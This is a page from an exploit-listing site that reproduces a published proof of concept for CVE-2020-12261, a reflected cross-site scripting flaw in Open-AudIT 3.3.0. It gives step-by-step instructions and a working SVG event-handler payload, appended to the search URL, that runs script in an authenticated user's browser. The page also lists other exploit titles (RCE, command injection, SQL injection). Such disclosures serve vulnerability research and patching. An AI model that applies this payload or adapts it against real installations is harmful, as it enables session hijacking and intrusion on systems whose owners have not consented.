Openaudit 3.3.0 reflective crosssite scripting (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-05-26 | Type : webapps | Platform : php
This exploit / vulnerability Openaudit 3.3.0 reflective crosssite scripting (authenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)
# Date: 2020-04-26
# Exploit Author: Kamaljeet Kumar
# Vendor Homepage: https://opmantek.com/network-discovery-inventory-software/
# Software Link: https://www.open-audit.org/downloads.php
# Version: 3.3.0
# CVE : CVE-2020-12261
# POC:
Step 1: Login to Open-Audit
Step 2: Go to "http://192.168.0.4/open-audit/index.php/search/" and add this "<svg><animate onend=alert(1) attributeName=x dur=1s>" payload after the search, the URL look like: http://192.168.0.4/open-audit/index.php/search/<svg><animate onend=alert(1) attributeName=x dur=1s>

Then we get the XSS pop up.

Openaudit 3.3.0 reflective crosssite scripting (authenticated)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Openaudit 3.3.0 reflective crosssite scripting (authenticated) Vulnerability / Exploit